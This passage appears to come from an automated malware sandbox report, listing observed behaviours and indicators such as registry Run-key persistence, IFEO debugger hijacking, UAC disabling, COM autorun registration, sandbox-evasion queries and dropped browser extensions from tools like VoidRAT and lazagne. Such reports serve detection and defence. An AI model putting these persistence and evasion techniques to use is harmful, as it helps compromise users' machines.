\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "yyote.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "mzpf.exe" explorer.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AUTOKEY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AUTOKEY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation ghjk.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation ucMKVtG.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation PsLoggedon.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation 360TS_Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation 2238.exe Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Personalized_notepad_with_reminders.lnk ama.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mode_for_pro_players_for_speed.lnk Process not Found -
Executes dropped EXE 64 IoCs
pid Process 4608 Aztec.exe 4344 updater.exe 2928 iox.exe 4836 %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe 4312 srr.exe 1728 Ghxyq.exe 3888 Ghxyq.exe 4644 tuc4.exe 2348 pp.exe 4972 is-RKAFE.tmp 4396 UdioConverterRipper.exe 1384 UdioConverterRipper.exe 1252 PsLoggedon.exe 3104 ._cache_PsLoggedon.exe 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 4288 Synaptics.exe 4768 ._cache_Synaptics.exe 688 360TS_Setup.exe 4976 360TS_Setup.exe 4616 NBYS%20ASM.NET.exe 3012 VoidRAT.exe 1356 xmrig.exe 1092 fortnite3.exe 2156 jxszdjp.exe 2940 jxszdjpSrv.exe 5076 DesktopLayer.exe 4308 tuc6.exe 3448 is-I2SOJ.tmp 3872 cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe 3640 XDisk.exe 4148 WatchDog.exe 2532 ama.exe 2608 ghjk.exe 2492 BLduscfibj.exe 1476 ghjk.exe 940 BLduscfibj.exe 1108 BLduscfibj.exe 5000 NSudo.exe 2964 0j4.exe 448 tnydzrrq.mxi.exe 4304 0j4.exe 2892 lazagne.exe 3256 lazagne.exe 1476 hv.exe 1432 netsh.exe 3508 f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe 4652 reg.exe 4664 StringIds.exe 4736 Tags.exe 480 InstallSetup2.exe 4764 schtasks.exe 5112 2238.exe 3828 powershell.exe 3880 aTRkSzKI5BC7TPjmCAGIPWNw.exe 3476 assistant_installer.exe 1700 JYQvDsNLyD1BiHmpCiD5dmqQ.exe 2888 H8Vxc3qhrAdW6f9d48nBRkdV.exe 3116 BroomSetup.exe 872 pM1YjaTge9xq11lwGXHw5wei.exe 2776 schtasks.exe 1292 qhD0Fjd2sS2bPUQL1AQPs2sm.exe 2340 qhD0Fjd2sS2bPUQL1AQPs2sm.exe 736 qhD0Fjd2sS2bPUQL1AQPs2sm.exe 5576 qhD0Fjd2sS2bPUQL1AQPs2sm.exe -
Loads dropped DLL 36 IoCs
pid Process 4972 is-RKAFE.tmp 1632 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe 688 360TS_Setup.exe 4976 360TS_Setup.exe 3448 is-I2SOJ.tmp 2532 ama.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3256 lazagne.exe 3828 powershell.exe 3828 powershell.exe 1476 hv.exe 2888 H8Vxc3qhrAdW6f9d48nBRkdV.exe 2888 H8Vxc3qhrAdW6f9d48nBRkdV.exe 1292 qhD0Fjd2sS2bPUQL1AQPs2sm.exe 2340 qhD0Fjd2sS2bPUQL1AQPs2sm.exe 736 qhD0Fjd2sS2bPUQL1AQPs2sm.exe 5576 qhD0Fjd2sS2bPUQL1AQPs2sm.exe 5656 qhD0Fjd2sS2bPUQL1AQPs2sm.exe 6032 cxcfHffNmhPEQy61bLBMgSz0.exe 6032 cxcfHffNmhPEQy61bLBMgSz0.exe 3476 assistant_installer.exe 3476 assistant_installer.exe 5356 assistant_installer.exe 5356 assistant_installer.exe 2624 rundll32.exe 3120 ls0uPFdYZj1I88hK7WfRz2aW.exe 3120 ls0uPFdYZj1I88hK7WfRz2aW.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ThreadingModel = "Apartment" cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID\{1F0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32 cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" cxcfHffNmhPEQy61bLBMgSz0.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{2E0FC07D-A72F-30E5-FE9F-6274A0D2B0A7}\InProcServer32\ = "C:\\Windows\\Panther\\UnattendGC\\ShellSysMenu.dll" cxcfHffNmhPEQy61bLBMgSz0.exe -
resource yara_rule behavioral3/files/0x00070000000232f9-8081.dat themida -
resource yara_rule behavioral3/memory/4312-109-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/4312-111-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/4312-113-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/1728-118-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/1728-121-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/1728-120-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/1728-122-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/4312-135-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/1728-139-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/3888-143-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/1552-379-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/memory/3888-481-0x0000000010000000-0x00000000101B9000-memory.dmp upx behavioral3/memory/1552-498-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/memory/1552-502-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/memory/1552-504-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/memory/1552-511-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/memory/1552-516-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/memory/1552-521-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/memory/1552-527-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/memory/1552-537-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp upx behavioral3/files/0x00060000000232bd-1162.dat upx behavioral3/files/0x00060000000232bf-1169.dat upx behavioral3/files/0x000600000002331f-7242.dat upx behavioral3/files/0x000a0000000235f0-14425.dat upx behavioral3/files/0x0008000000023605-14914.dat upx behavioral3/files/0x0006000000023619-15344.dat upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 91.211.247.248 -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 35 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" Synaptics.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sasuke = "C:\\Users\\Admin\\AppData\\Roaming\\sasuke.exe" Tags.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" AhjRPOGDGfLEDTGgehsebysf.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" PsLoggedon.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" JYQvDsNLyD1BiHmpCiD5dmqQ.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sasuke = "C:\\Users\\Admin\\AppData\\Roaming\\sasuke.exe" 0j4.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\139k3s9mie973k.exe\"" explorer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA DpJ873NtgAlrFVbXX7h6FnM9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA is-RKAFE.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hreeirv Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rundll32.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 360TS_Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jxszdjp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AUTOKEY.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tuc4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA assistant_installer.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Synaptics.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UdioConverterRipper.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" InstallSetup2.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NBYS%20ASM.NET.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BroomSetup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VoidRAT.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA uLBknOhgdGBcPr4C2VIutNtS.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5OOy4aNueB5QpC3S0HgRtZvH.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hueeirv Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 360TS_Setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA StringIds.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA is-I2SOJ.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qI7aPgVljoENRNVrUTEUh6Bq.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 139k3s9mie973k.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json ucMKVtG.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ucMKVtG.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ucMKVtG.exe -
Enumerates connected drives 3 TTPs 26 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: Ghxyq.exe File opened (read-only) \??\L: Ghxyq.exe File opened (read-only) \??\U: Ghxyq.exe File opened (read-only) \??\X: Ghxyq.exe File opened (read-only) \??\P: Ghxyq.exe File opened (read-only) \??\D: qhD0Fjd2sS2bPUQL1AQPs2sm.exe File opened (read-only) \??\H: Ghxyq.exe File opened (read-only) \??\I: Ghxyq.exe File opened (read-only) \??\K: Ghxyq.exe File opened (read-only) \??\B: Ghxyq.exe File opened (read-only) \??\W: Ghxyq.exe File opened (read-only) \??\D: qhD0Fjd2sS2bPUQL1AQPs2sm.exe File opened (read-only) \??\Q: Ghxyq.exe File opened (read-only) \??\R: Ghxyq.exe File opened (read-only) \??\S: Ghxyq.exe File opened (read-only) \??\T: Ghxyq.exe File opened (read-only) \??\J: Ghxyq.exe File opened (read-only) \??\M: Ghxyq.exe File opened (read-only) \??\N: Ghxyq.exe File opened (read-only) \??\E: Ghxyq.exe File opened (read-only) \??\G: Ghxyq.exe File opened (read-only) \??\F: qhD0Fjd2sS2bPUQL1AQPs2sm.exe File opened (read-only) \??\O: Ghxyq.exe File opened (read-only) \??\V: Ghxyq.exe File opened (read-only) \??\Z: Ghxyq.exe File opened (read-only) \??\F: qhD0Fjd2sS2bPUQL1AQPs2sm.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Maps connected drives based on registry 3 TTPs 54 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum BroomSetup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 DpJ873NtgAlrFVbXX7h6FnM9.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 InstallUtil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 5OOy4aNueB5QpC3S0HgRtZvH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum UdioConverterRipper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum 360TS_Setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum uLBknOhgdGBcPr4C2VIutNtS.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 qI7aPgVljoENRNVrUTEUh6Bq.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 360TS_Setup.exe 